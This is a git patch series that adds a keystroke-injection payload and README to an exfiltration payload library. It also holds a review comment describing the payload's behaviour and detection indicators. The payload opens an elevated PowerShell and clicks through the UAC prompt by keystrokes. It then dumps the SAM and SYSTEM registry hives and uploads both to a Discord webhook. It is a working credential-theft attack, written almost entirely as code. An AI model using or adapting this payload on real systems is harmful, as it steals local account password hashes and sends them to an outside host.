From 15f8f25701bacc1816c1f942268517cf2d14f22b Mon Sep 17 00:00:00 2001
From: Luu <112649910+luu176@users.noreply.github.com>
Date: Wed, 25 Sep 2024 00:18:39 +0200
Subject: [PATCH 1/4] Create payload.txt
---
 .../ntlm_exfiltration/payload.txt | 34 +++++++++++++++++++
 1 file changed, 34 insertions(+)
 create mode 100644 payloads/library/exfiltration/ntlm_exfiltration/payload.txt
diff --git a/payloads/library/exfiltration/ntlm_exfiltration/payload.txt b/payloads/library/exfiltration/ntlm_exfiltration/payload.txt
new file mode 100644
index 0000000..ee2b9d6
--- /dev/null
+++ b/payloads/library/exfiltration/ntlm_exfiltration/payload.txt
@@ -0,0 +1,34 @@
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: luu176
+
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+END_EXTENSION
+
+DEFINE #DISCORD_WEBHOOK_URL DISCORD_WEBHOOK_URL_HERE
+GUI d
+DELAY 1000
+GUI r
+DELAY 1000
+STRINGLN powershell Start-Process powershell -Verb runAs
+DELAY 3000
+LEFTARROW
+ENTER
+DELAY 3000
+STRINGLN C:\Windows\System32\reg save HKLM\SAM sam /y; C:\Windows\System32\reg save HKLM\SYSTEM system /y; Add-Type -AssemblyName "System.Net.Http"; $webhookUrl = "#DISCORD_WEBHOOK_URL"; $client = New-Object System.Net.Http.HttpClient; $fileStream1 = [System.IO.File]::OpenRead("sam"); $fileContent1 = New-Object System.Net.Http.StreamContent($fileStream1); $content1 = New-Object System.Net.Http.MultipartFormDataContent; $content1.Add($fileContent1, "file", "sam"); $client.PostAsync($webhookUrl, $content1).Result; $fileStream1.Close(); $fileStream2 = [System.IO.File]::OpenRead("system"); $fileContent2 = New-Object System.Net.Http.StreamContent($fileStream2); $content2 = New-Object System.Net.Http.MultipartFormDataContent; $content2.Add($fileContent2, "file", "system"); $client.PostAsync($webhookUrl, $content2).Result; $fileStream2.Close()
+DELAY 500
+GUI d
From c898ed7858a76b584333672f2873b219d9f17a56 Mon Sep 17 00:00:00 2001
From: Luu <112649910+luu176@users.noreply.github.com>
Date: Wed, 25 Sep 2024 00:20:06 +0200
Subject: [PATCH 2/4] Create README.md
---
 .../exfiltration/ntlm_exfiltration/README.md | 28 +++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 payloads/library/exfiltration/ntlm_exfiltration/README.md
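Review bot: The "NTLM hash" wording in the README and directory name understates what the long STRINGLN line near the end of this hunk does: `reg save HKLM\SAM` and `reg save HKLM\SYSTEM` copy the complete SAM and SYSTEM hives (the stored credential material for every local account plus the key needed to decrypt it), and the `sam` and `system` copies are written to the elevated shell's working directory and never removed, so the documentation should name the hives and the on-disk artifacts explicitly. It should also state the preconditions the keystroke sequence assumes: an unlocked interactive session whose user can approve the UAC consent prompt that `LEFTARROW`/`ENTER` answers, and a webhook URL that, once substituted into `#DISCORD_WEBHOOK_URL`, sits in cleartext on the device and is disclosed by anyone who recovers it. The `$_OS` value set inside PASSIVE_WINDOWS_DETECT is never read after `END_EXTENSION`, so the OS check is currently informational only; a comment such as `REM $_OS is set by PASSIVE_WINDOWS_DETECT but not consulted below` would make that explicit. For defenders, the observable indicators are a `reg.exe save HKLM\SAM` / `HKLM\SYSTEM` command line spawned from an elevated powershell.exe, the two new files in its working directory, and a multipart POST from powershell.exe to a discord.com webhook; process-creation auditing with command-line logging (Windows Event ID 4688, or Sysmon process-creation and network-connection events) records all three.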
diff --git a/payloads/library/exfiltration/ntlm_exfiltration/README.md b/payloads/library/exfiltration/ntlm_exfiltration/README.md
new file mode 100644
index 0000000..acba0c3
--- /dev/null
+++ b/payloads/library/exfiltration/ntlm_exfiltration/README.md
@@ -0,0 +1,28 @@
+# Exfiltrate NTLM Hash - Windows ✅
+
+A script used to exfiltrate the NTLM hash on a Windows machine.
+
+## Description
+
+A script used to capture and exfiltrate the NTLM hash of a Windows machine. It utilizes PowerShell to retrieve the SAM and SYSTEM files, then sends them to a Discord webhook.
+
+### Settings
+
+* Set the Discord webhook URL
+* Ensure the webhook permissions are configured
+
+## Credits
+
+
+
+
+ Github + |
+